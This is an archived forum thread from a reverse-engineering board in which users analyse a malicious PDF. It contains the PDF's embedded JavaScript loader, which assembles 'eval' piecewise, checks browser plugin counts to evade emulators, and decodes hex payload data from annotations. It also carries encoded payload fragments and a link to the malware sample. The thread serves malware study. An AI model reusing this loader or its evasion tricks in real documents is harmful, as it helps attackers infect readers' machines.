Help analyzing a malicious PDF [Archive] - RCE Messageboard's Regroupment

Sunk

August 6th, 2011, 05:50

1. Neither Annot in object 5 or 7 have a "-" in them so how does "var arr = sum.split(/-/);" create an array?
2. What does "app[fnc]/**/(buf);" do?
3. What is the point of checking how many browser plugins there are?

JS from object 9

Code:



var pr = null;

var fnc = 'ev';

var sum = '';



app.doc.syncAnnotScan();



if (app.plugIns.length != 0) {

	var num = 1;

	pr = app.doc.getAnnots(



		{

			nPage: 0

		}



	);



	sum = pr[num].subject;

}



var buf = "";



if (app.plugIns.length > 3) {

	fnc += 'a';

	var arr = sum.split(/-/);



	for (var i = 1; i < arr.length; i++) {

		buf += String.fromCharCode("0x"+arr[I]);

	}

	fnc += 'l';

}



if (app.plugIns.length >= 2)

{

	app[fnc]/**/(buf);

}

Part of the encoded data from object 5

Code:



a5q311k7p350g164m0t241n1e6g6d232q4r241004276i2j4q6f3i2q2l6j7j2h494u5g1l6t780946777e8048276m3q4336083 6726c68283b6l7f7q4o5l7e1h7g32715l312h7p6p3r8383431227191n435l2j2e5i1l230a2b5u123s7a3p3h045o371t6d3n3 q3b6s61193o7a6f5t4j3o58311r7h875l64460s2n4j876d134c3u1925763u1d33432n5f563r50864n647h845p5e7j0h2k677 m0t2h1s6o31085j2q0j065g2718553c472c5062181k6d7o723f441n1a206f6m4d304718144o6639055b2m7f3161381q3m5t4 a6h6k6756237d4u7s0n464r7l66264r5h0g1f68651n0l5d5k7e03742n2q087h371b25620i0f5i5r5k3c3f2j0i454j746l3u4 m0u5d3i6u2l6c3f7a81414r2s7d045g5t5n426e3i1s07610u1l4p6q2d6p3q6u3t1c305352155s5f4t5n7d5d6k2n7r052g3g0 96f2p1g6k0a132s3307022r306p5d30437t5q3b1g1869527s0o4c1b167h7a404n2h436p1u226e2s012k3h4o395k347c4h374 i656g3g617k7l4i7o6951257t5q22266c621n5r61791g2m5s72874d3i040g75336s303b0r045e356f0l3n270e1e5e4d6t3i4 i6g680r7729680p865a49473379152359395u3336786i440d643d2d006m362u7781556n6j010g525g7p0u361a0h1e0g3q0r2 j3h117i4o5c4g1r3p1m1m284u65851s3u6p7b0a822d802s6e5u3n1f2j6u072r512a5a1n0m5d6m2j62742u3k1b4t1a2j560j4 q64460q7241846q0p558575814q1o75793e1r5r4c430q7u50

Part of the encoded data from object 7

Code:



z00z6az00z33z00z68z00z31z00z31z00z37z00z69z00z34z00z6fz00z35z00z63z00z34z00z67z00z31z00z72z00z33z00z 70z00z31z00z6dz00z31z00z6dz00z32z00z38z00z34z00z75z00z36z00z35z00z38z00z35z00z31z00z73z00z33z00z75z0 0z36z00z70z00z37z00z62z00z30z00z61z00z38z00z32z00z32z00z64z00z38z00z30z00z32z00z73z00z36z00z65z00z35 z00z75z00z33z00z6ez00z31z00z66z00z32z00z6az00z36z00z75z00z30z00z37z00z32z00z72z00z35z00z31z00z32z00z 61z00z35z00z61z00z31z00z6ez00z30z00z6dz00z35z00z64z00z36z00z6dz00z32z00z6az00z36z00z32z00z37z00z34z0 0z32z00z75z00z33z00z6bz00z31z00z62z00z34z00z74z00z31z00z61z00z32z00z6az00z35z00z36z00z30z00z6az00z34 z00z71z00z36z00z34z00z34z00z36z00z30z00z71z00z37z00z32z00z34z00z31z00z38z00z34z00z36z00z71z00z30z00z 70z00z35z00z35z00z38z00z35z00z37z00z35z00z38z00z31z00z34z00z71z00z31z00z6fz00z37z00z35z00z37z00z39z0 0z33z00z65z00z31z00z72z00z35z00z72z00z34z00z63z00z34z00z33z00z30z00z71z00z37z00z75z00z35z00z30z00z22 z00z29z00z3bz00z0dz00z0az00z0dz00z0az00z0dz00z0a

MALWARE/BIOHAZARD
http://www.megaupload.com/?d=5F52NSCW

R33N

August 8th, 2011, 15:20

I am new to examining this stuff, but it looks like a good one to look at. Thanks for the download. It looks like you are to the point were you have to start doing a couple things.

Q.What is the point of checking how many browser plugins there are?

A. If you notice that the browser checks are looking for a amount of plugins(which must return a number) greater than the number in each if statement.

In this case it could be that they are using this to identify if the script is running on a user machine that may have plugins or a emulation environment that might not have any sort of plugins. My thought is these can be removed or you could say If ( 3 > 2) { code }.

Trying to see it from an attacker perspective. If I want to try an identify the environment that my payload is running in maybe I can check pllugins to see if there are any there. If not the script is not going to run, but in most cases there will be for a users machine so lets let it run.

Q. What does "app[fnc]/**/(buf);" do?

var fnc = 'ev';
fnc += 'a';
fnc += 'l';

var fnc = 'eval' --> this is probably broken up in order to evade signature detection by automated scanner.
app.doc ----> app seems to be the object used throughout this code "that I am not sure of" Also maybe this means that we need values form the plugins, but I don't think so.

Where I am at on this currently -----> I actually ran into errors trying to get the code to execute with spider monkey because of app.doc errors. After adding these objects in then my issue is now 'pr' not having a value.

Q. Neither Annot in object 5 or 7 have a "-" in them so how does "var arr = sum.split(/-/);" create an array?

I think the final result of this code is to convert unicode into characters from the result of element1 = (0x + "object 5 (2 characters)"

; element2 = For each "z" replace with element1.

Of course that is just a all just a theory not really any proof until I get the shellcode to output. Once that is the case can frame it up and start debugging it and seeing what is next.